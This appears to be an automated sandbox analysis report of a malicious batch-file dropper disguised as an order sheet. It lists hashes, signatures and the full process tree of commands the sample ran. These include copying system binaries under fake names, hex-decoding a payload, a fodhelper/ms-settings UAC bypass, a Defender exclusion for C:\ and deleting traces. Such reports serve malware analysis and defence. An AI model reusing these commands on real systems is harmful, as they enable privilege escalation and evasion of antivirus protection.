Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
142s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
13/05/2024, 18:40
Static task
static1
Behavioral task
behavioral1
Sample
Order Sheet#2084-0147.bat
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
Order Sheet#2084-0147.bat
Resource
win10v2004-20240508-en
General
-
Target
Order Sheet#2084-0147.bat
-
Size
3.1MB
-
MD5
6625a9ac66586e588f4786cdbfaf2ed8
-
SHA1
33c6c2cfc8e71d8a6187d110666f9c0c2decff03
-
SHA256
c2e16be582aa7399bdb7b89cf72ba0f9bbecd5a128ad73d26ca0981963f83f5f
-
SHA512
7ba8791d78fc3e01b69755fbf3d2569fe59ad0efcc4a87af88aa8cef4dbaf7f1715b4567631fcc119f735966d4791e737ee045d7966b51426fdef365e43278e5
-
SSDEEP
24576:IFHMJaK5lhd5XfcIrAnYMEjS5W+DaunmO+RCNJXCP+I:IFHMJau/51rAnzQ
Malware Config
Signatures
-
Executes dropped EXE 24 IoCs
pid Process 2264 alpha.exe 3028 alpha.exe 2564 alpha.exe 2736 alpha.exe 2604 kn.exe 1648 alpha.exe 1936 alpha.exe 2780 alpha.exe 2376 alpha.exe 2436 xkn.exe 2524 alpha.exe 2672 ger.exe 2704 alpha.exe 2556 kn.exe 2828 alpha.exe 1176 Ping_c.pif 2364 alpha.exe 1452 alpha.exe 344 alpha.exe 2240 alpha.exe 1604 alpha.exe 1352 alpha.exe 1244 alpha.exe 2384 alpha.exe -
Loads dropped DLL 15 IoCs
pid Process 1860 cmd.exe 1860 cmd.exe 1860 cmd.exe 1860 cmd.exe 2736 alpha.exe 1860 cmd.exe 1860 cmd.exe 1860 cmd.exe 1860 cmd.exe 2376 alpha.exe 2436 xkn.exe 2436 xkn.exe 2524 alpha.exe 316 WerFault.exe 316 WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 316 1176 WerFault.exe 51 -
Kills process with taskkill 1 IoCs
pid Process 1340 taskkill.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\ms-settings ger.exe Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\ms-settings\shell ger.exe Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\ms-settings\shell\open ger.exe Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" ger.exe Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\ms-settings\shell\open\command ger.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1176 Ping_c.pif -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2436 xkn.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2436 xkn.exe Token: SeDebugPrivilege 1340 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1860 wrote to memory of 1928 1860 cmd.exe 29 PID 1860 wrote to memory of 1928 1860 cmd.exe 29 PID 1860 wrote to memory of 1928 1860 cmd.exe 29 PID 1860 wrote to memory of 2264 1860 cmd.exe 30 PID 1860 wrote to memory of 2264 1860 cmd.exe 30 PID 1860 wrote to memory of 2264 1860 cmd.exe 30 PID 1860 wrote to memory of 3028 1860 cmd.exe 31 PID 1860 wrote to memory of 3028 1860 cmd.exe 31 PID 1860 wrote to memory of 3028 1860 cmd.exe 31 PID 1860 wrote to memory of 2564 1860 cmd.exe 32 PID 1860 wrote to memory of 2564 1860 cmd.exe 32 PID 1860 wrote to memory of 2564 1860 cmd.exe 32 PID 2564 wrote to memory of 2660 2564 alpha.exe 33 PID 2564 wrote to memory of 2660 2564 alpha.exe 33 PID 2564 wrote to memory of 2660 2564 alpha.exe 33 PID 1860 wrote to memory of 2736 1860 cmd.exe 34 PID 1860 wrote to memory of 2736 1860 cmd.exe 34 PID 1860 wrote to memory of 2736 1860 cmd.exe 34 PID 2736 wrote to memory of 2604 2736 alpha.exe 35 PID 2736 wrote to memory of 2604 2736 alpha.exe 35 PID 2736 wrote to memory of 2604 2736 alpha.exe 35 PID 1860 wrote to memory of 1648 1860 cmd.exe 36 PID 1860 wrote to memory of 1648 1860 cmd.exe 36 PID 1860 wrote to memory of 1648 1860 cmd.exe 36 PID 1648 wrote to memory of 2572 1648 alpha.exe 37 PID 1648 wrote to memory of 2572 1648 alpha.exe 37 PID 1648 wrote to memory of 2572 1648 alpha.exe 37 PID 1860 wrote to memory of 1936 1860 cmd.exe 38 PID 1860 wrote to memory of 1936 1860 cmd.exe 38 PID 1860 wrote to memory of 1936 1860 cmd.exe 38 PID 1936 wrote to memory of 2544 1936 alpha.exe 39 PID 1936 wrote to memory of 2544 1936 alpha.exe 39 PID 1936 wrote to memory of 2544 1936 alpha.exe 39 PID 1860 wrote to memory of 2780 1860 cmd.exe 40 PID 1860 wrote to memory of 2780 1860 cmd.exe 40 PID 1860 wrote to memory of 2780 1860 cmd.exe 40 PID 2780 wrote to memory of 2724 2780 alpha.exe 41 PID 2780 wrote to memory of 2724 2780 alpha.exe 41 PID 2780 wrote to memory of 2724 2780 alpha.exe 41 PID 1860 wrote to memory of 2376 1860 cmd.exe 42 PID 1860 wrote to memory of 2376 1860 cmd.exe 42 PID 1860 wrote to memory of 2376 1860 cmd.exe 42 PID 2376 wrote to memory of 2436 2376 alpha.exe 43 PID 2376 wrote to memory of 2436 2376 alpha.exe 43 PID 2376 wrote to memory of 2436 2376 alpha.exe 43 PID 2436 wrote to memory of 2524 2436 xkn.exe 44 PID 2436 wrote to memory of 2524 2436 xkn.exe 44 PID 2436 wrote to memory of 2524 2436 xkn.exe 44 PID 2524 wrote to memory of 2672 2524 alpha.exe 45 PID 2524 wrote to memory of 2672 2524 alpha.exe 45 PID 2524 wrote to memory of 2672 2524 alpha.exe 45 PID 1860 wrote to memory of 2704 1860 cmd.exe 46 PID 1860 wrote to memory of 2704 1860 cmd.exe 46 PID 1860 wrote to memory of 2704 1860 cmd.exe 46 PID 2704 wrote to memory of 2556 2704 alpha.exe 47 PID 2704 wrote to memory of 2556 2704 alpha.exe 47 PID 2704 wrote to memory of 2556 2704 alpha.exe 47 PID 1860 wrote to memory of 2828 1860 cmd.exe 48 PID 1860 wrote to memory of 2828 1860 cmd.exe 48 PID 1860 wrote to memory of 2828 1860 cmd.exe 48 PID 2828 wrote to memory of 1340 2828 alpha.exe 49 PID 2828 wrote to memory of 1340 2828 alpha.exe 49 PID 2828 wrote to memory of 1340 2828 alpha.exe 49 PID 1860 wrote to memory of 1176 1860 cmd.exe 51
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Order Sheet#2084-0147.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"2⤵PID:1928
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "2⤵
- Executes dropped EXE
PID:2264
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"2⤵
- Executes dropped EXE
PID:3028
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵PID:2660
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Order Sheet#2084-0147.bat" "C:\\Users\\Public\\Ping_c.mp4" 92⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Order Sheet#2084-0147.bat" "C:\\Users\\Public\\Ping_c.mp4" 93⤵
- Executes dropped EXE
PID:2604
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"3⤵PID:2572
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"3⤵PID:2544
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"3⤵PID:2724
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Users\Public\ger.exeC:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""5⤵
- Executes dropped EXE
- Modifies registry class
PID:2672
-
-
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 123⤵
- Executes dropped EXE
PID:2556
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1340
-
-
-
C:\Users\Public\Libraries\Ping_c.pifC:\Users\Public\Libraries\Ping_c.pif2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1176 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 6843⤵
- Loads dropped DLL
- Program crash
PID:316
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"2⤵
- Executes dropped EXE
PID:2364
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"2⤵
- Executes dropped EXE
PID:1452
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"2⤵
- Executes dropped EXE
PID:344
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2240
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1604
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1352
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1244
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2384
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.1MB
MD53338081e5056970e3ce7ca7cd4f6edb5
SHA105bd7eab89d013783997d1e46903ffea69598591
SHA2562b3cc2641089daadfd6f8292d8ec912d3b2a1746ae9961962c873e7ece07ba30
SHA5123c101c367e6b74bc43eb5ad21b091483fccc1be2f7c8b297750682a531739a390a3cb81f5b0567ae031f85f54f9f0f2970c0ac1f0b5ff0969b23388be494aef5
-
Filesize
2.1MB
MD59662e6c3152cd084a64d2b87d2e5cf99
SHA1213bb41e58324a7da5b86c1919c021aa280f8c5f
SHA25652e26aa7a38ff24d5a91c3a0a5c8fdab46ec216ead28dc8c3fc8eb1ed91c0471
SHA51261b64ced472220aa707b9e0dc96ac53f7e7bf6d7f6ac8f5a5b2e6edbc97dcc8fa91e38642d5bee9359bb23affde6f2393ee6a1520cb0bd13ca5e34fd62519ee9
-
Filesize
73KB
MD59d0b3066fe3d1fd345e86bc7bcced9e4
SHA1e05984a6671fcfecbc465e613d72d42bda35fd90
SHA2564e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e
SHA512d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119
-
Filesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
Filesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d